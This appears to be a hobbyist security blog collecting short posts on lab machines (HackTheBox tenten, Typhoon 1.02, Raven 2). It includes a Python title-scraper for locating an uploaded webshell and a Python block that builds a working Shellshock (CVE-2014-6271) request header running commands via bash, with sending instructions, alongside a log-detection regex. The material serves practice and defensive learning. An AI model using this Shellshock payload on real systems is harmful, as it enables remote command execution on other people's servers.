Lately, I've been playing around on HackTheBox to expand my game.  I find the platform to be challenging because the Capture the Flag style hacking is another world to me.  I frequently see people writing "this is easy" when referring to a specific box or challenge, but I think it's only easy if you know how to do "something".  For example, I know next to nothing about steganography, and when I came across an image with a hidden message, I had no idea what tool to use for the problem.  But then you discover a tool like steghide and all of a sudden, it IS "easy" -- as they say.  Moving on....

    I've been working my way through some of the easier boxes in both the Active and Retired sections, and my recent project is tenten, which is where I came across the WordPress Job-Manager vulnerability.  I've said this previously: I'm a Python n00b, but I learn by doing.  This seemed like a great opportunity because I needed to parse through a bunch of pages -- grabbing the title from each page.  Essentially, at this point in the process of working my way through this box, I'm trying to find my uploaded shell.
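The title-grabbing script described above, written here as an added example rather than the author's own script. It pulls the &lt;title&gt; out of each page with the standard-library HTML parser and flags the pages whose title does not look like the rest of the site, which is how an uploaded shell tends to stand out among a pile of WordPress pages. The sample pages, URLs and the "Example Site" title marker are constructed for the example; in a real run the HTML would come from the fetch() helper instead of the inline dict.

```python
"""Grab the <title> of many pages and flag the odd ones out (added example, not the page's own code)."""
from html.parser import HTMLParser
import urllib.request


class TitleParser(HTMLParser):
    """Collects the text between <title> and </title>; everything else is ignored."""

    def __init__(self):
        super().__init__()
        self.in_title = False
        self.title = ""

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self.in_title = True

    def handle_endtag(self, tag):
        if tag == "title":
            self.in_title = False

    def handle_data(self, data):
        if self.in_title:
            self.title += data


def page_title(html):
    """Return the stripped <title> text, or None when the page has no title at all."""
    parser = TitleParser()
    parser.feed(html)
    return parser.title.strip() or None


def fetch(url, timeout=5):
    """Fetch one page as text; only used when running against a live target (not in the offline demo)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def odd_titles(pages, site_marker):
    """Map every URL to its title and return the URLs whose title lacks the site marker.

    pages: dict of url -> html. A page with no title counts as odd too, since a
    dropped webshell usually has no title or a title of its own.
    """
    odd = []
    for url, html in pages.items():
        title = page_title(html)
        if title is None or site_marker not in title:
            odd.append(url)
    return odd


# Constructed sample pages standing in for fetched WordPress output (hypothetical site and paths).
SAMPLE_PAGES = {
    "http://example.test/?p=1": "<html><head><title>Hello world! - Example Site</title></head><body></body></html>",
    "http://example.test/?p=2": "<html><head><title>About - Example Site</title></head><body></body></html>",
    "http://example.test/wp-content/uploads/2020/10/shell.php": "<html><head><title>Uploaded Files</title></head><body>cmd</body></html>",
    "http://example.test/wp-content/uploads/2020/10/notes.html": "<html><head></head><body>no title here</body></html>",
}


if __name__ == "__main__":
    for url in odd_titles(SAMPLE_PAGES, "Example Site"):
        print("odd title:", url, "->", page_title(SAMPLE_PAGES[url]))
```

Against a live target you would replace the dict with `{url: fetch(url) for url in candidate_urls}` and keep the same `odd_titles` call; the parser does not care where the HTML came from.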

    The description of Typhoon 1.02 makes it very clear that this box is extremely vulnerable on multiple fronts.  I didn't set out to find every avenue and I'm sure I did not.  As I'm reading the description again, I clearly didn't even touch DNS.  That being said, I found more than a few low privilege entry points and multiple privilege escalations. 

    Two things I really like about this box --

    1.  I got to play with a few things that I'd not seen previously.
    2.  This box, like the metasploitable series, is good to come back to from time to time after learning new tricks.  Clearly I need to learn some new DNS exploitation techniques.  

    As soon as I scanned this box, I knew my entry point.  What's the first rule of Fight Club?  You don't talk about Fight Club.  So I won't say where I got my first experience with a similar box but James and I are quite familiar with each other.  

    In the description, it's mentioned that it was formerly on HackTheBox.  I've played on HackTheBox, pulled my hair out working on HTB boxes, and this seems like an easy box for HTB.  Or maybe it's hard and the entry was known to me.  I digress.

    The scanner comes back with:  "Site appears vulnerable to the 'shellshock' vulnerability ("

    I realize I'm talking about a four-year-old vulnerability, but it's one that still exists and it's a rabbit hole I wanted to jump into.  I've come across this vulnerability a few times in the past, and I've either used Metasploit or ("Apache mod_cgi - 'Shellshock' Remote Command Injection") to get my shell.  I seem to recall having an issue with one or both at some point, and I moved on to another avenue because my search results yielded bits and pieces but nothing that I could wrap my hands around.

    Stumbling upon this vulnerability recently, I paused to dig into it with the intention of getting a better understanding for manual exploitation.
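The manual side of the Apache mod_cgi Shellshock (CVE-2014-6271) vector, as an added example that is not part of the original post. mod_cgi copies request headers into the CGI script's environment (User-Agent becomes HTTP_USER_AGENT), and a vulnerable bash kept executing whatever followed a function definition of the form `() { :; };` in any environment variable. The block builds the raw request with that header, includes the local bash self-check that was widely circulated when the bug was published, and runs the same `() {` signature over a couple of constructed Apache combined-format log lines to show what the probe looks like from the defender's side. The host, path and log lines are constructed for the example.

```python
"""Shellshock via mod_cgi: build the probe, check a local bash, spot the probe in logs (added example)."""
import re
import subprocess


def shellshock_header(cmd):
    """Header value that makes a vulnerable bash run `cmd`.

    `echo;` prints the blank line that terminates the HTTP headers, so the command
    output lands in the response body instead of mod_cgi returning a 500 for
    malformed headers. Path to bash is absolute because the CGI PATH is minimal.
    """
    return "() { :; }; echo; /bin/bash -c '%s'" % cmd


def build_probe(host, path, cmd):
    """Raw HTTP/1.1 request carrying the payload in User-Agent (any header works, this is the usual one)."""
    return (
        "GET %s HTTP/1.1\r\n" % path
        + "Host: %s\r\n" % host
        + "User-Agent: %s\r\n" % shellshock_header(cmd)
        + "Connection: close\r\n\r\n"
    )


def local_bash_vulnerable():
    """The classic self-test: export a function with trailing commands and see if bash runs them."""
    try:
        out = subprocess.run(
            ["bash", "-c", "echo probe"],
            env={"x": "() { :; }; echo vulnerable"},
            capture_output=True, text=True, timeout=5,
        ).stdout
    except FileNotFoundError:
        return None  # no bash on this box; nothing to test
    return "vulnerable" in out


# Signature of an exported-function prelude; the same thing mod_security rules keyed on.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache combined log format: client, ident, user, [time], "request", status, size, "referer", "user-agent".
COMBINED_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d+ \S+ "[^"]*" "(.*)"$'
)


def is_shellshock_attempt(header_value):
    return bool(SHELLSHOCK_RE.search(header_value))


def find_attempts(log_lines):
    """Return (client_ip, path) for each combined-format line whose User-Agent carries the prelude."""
    hits = []
    for line in log_lines:
        m = COMBINED_RE.match(line)
        if m and is_shellshock_attempt(m.group(4)):
            hits.append((m.group(1), m.group(3)))
    return hits


# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2020:13:55:36 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 93 "-" '
    '"() { :; }; echo; /bin/bash -c \'id\'"',
    '10.0.0.9 - - [10/Oct/2020:13:56:01 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
]


if __name__ == "__main__":
    print(build_probe("10.0.0.1", "/cgi-bin/user.sh", "id"))
    print("local bash vulnerable:", local_bash_vulnerable())
    print("attempts in log:", find_attempts(SAMPLE_LOG))
```

Send the probe with `nc host 80 < probe.txt` or paste the User-Agent value into curl's `-A`; a vulnerable target answers with the output of `id` as the body, a patched one with the script's normal output. The log scan is deliberately loose (just the `() {` prelude) because the part after the brace varies from one attacker to the next.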

    The description:  "Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in. Can you still breach Raven?"  

    I wasn't hunting flags but I found three of the four -- maybe I found one more but I don't remember because I wasn't looking.  

    This was a fun machine.  Admittedly, I got hung up on the initial shell for longer than I should have, but I knew it was my entry and I just had to get the syntax right.  Before I get ahead of myself too much, we start off with our scan:

    Does anyone actually write their own shells?  At some point, a few people did but now we just search for the type of shell we want and we find what we need.  Kali has quite a few under /usr/share/webshells and is another good resource. 

    Why reinvent the wheel shell when there are so many at our disposal?   To better understand the code we’re reading and writing.

    At best, I hack code.  I’ll never be fluent in Python because there are too many other things to learn but that doesn’t stop me from writing simple scripts.  The more baby scripts I write, the better I can understand what I’m reading when I’m looking at other code. 

    © 2020